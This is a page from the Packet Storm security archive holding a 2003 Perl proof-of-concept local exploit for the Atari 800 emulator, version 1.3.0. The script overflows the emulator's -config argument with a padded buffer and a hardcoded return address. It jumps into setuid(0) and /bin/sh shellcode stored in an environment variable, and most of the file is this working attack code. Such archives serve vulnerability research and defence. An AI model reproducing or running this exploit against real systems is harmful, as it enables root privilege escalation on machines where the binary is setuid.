exploit the possibilities

SynAtari800.pl

SynAtari800.pl
Posted Aug 5, 2003
Authored by OpTiKoOl

Local exploit for the atari800 Atari emulator on Linux. Makes use of the -config overflow. By default, this binary is not normally default on most Linux installations.

tags | exploit, overflow, local
systems | linux
SHA-256 | 6aadd23c68aa03fd20777677fdf26a1f88f63806dbb1d73b2a7fe7e914ed8645

SynAtari800.pl

Change Mirror Download
#!perl

########################################################
# PoC By OpTiKoOl, for Atari 800 Emulator, Version 1.3.0
# based on
# http://www.securityfocus.com/archive/1/331518/2003-08-01/2003-08-07/0
# -
# This PoC exploits a bof in parsing a very long config file ( > 250 bytes )
# As in the advisory there's other bofs. but i just researched this one to
# make a Proof-Of-Concept Code.
# In Gentoo Linux (distro where this poc was developed) there isn't any suid
# atari800 binaries. i suppose.. :D
# -
# Tested against Atari800 from portage.
# OpTiKoOl@syners.org & OpTiKoOl@psyfreakz.org
# -
# Big kiss to Neuza ;* ehehe The Buf Smashing The Stack! lol
# and a fucking shout to psychedelic ppl, you rockZ!
# Stay Fresh!

sub head {
print "#####################################################
# PoC against Atari 800 Emulator, Version 1.3.0
# by OpTiKoOl\@syners.org and OpTiKoOl\@psyfreakz.org
# 02/08/2003, CopyLeft by OpTiKoOl ...
# http://www.syners.org/ & http://psyfreakz.org/
# -
# Big Kiss 2 Neuza ;* Chuak! Chuak!
#\n";
}

# this sc was ripped from a fake (trojaned) exploit...
# but this is a real shellcode, so enjoy :D

$shellcode = "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" #setuid 0
. "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
. "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
. "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

$buf = "SYNERSOWNZ" x 25;
$ENV{'SYNERS'} = $shellcode;
$buf .= "\xad\xff\xff\xbf";
&head;
exec("/usr/bin/atari800 -config $buf");
Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    2 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    6 Files
  • 24
    May 24th
    19 Files
  • 25
    May 25th
    5 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close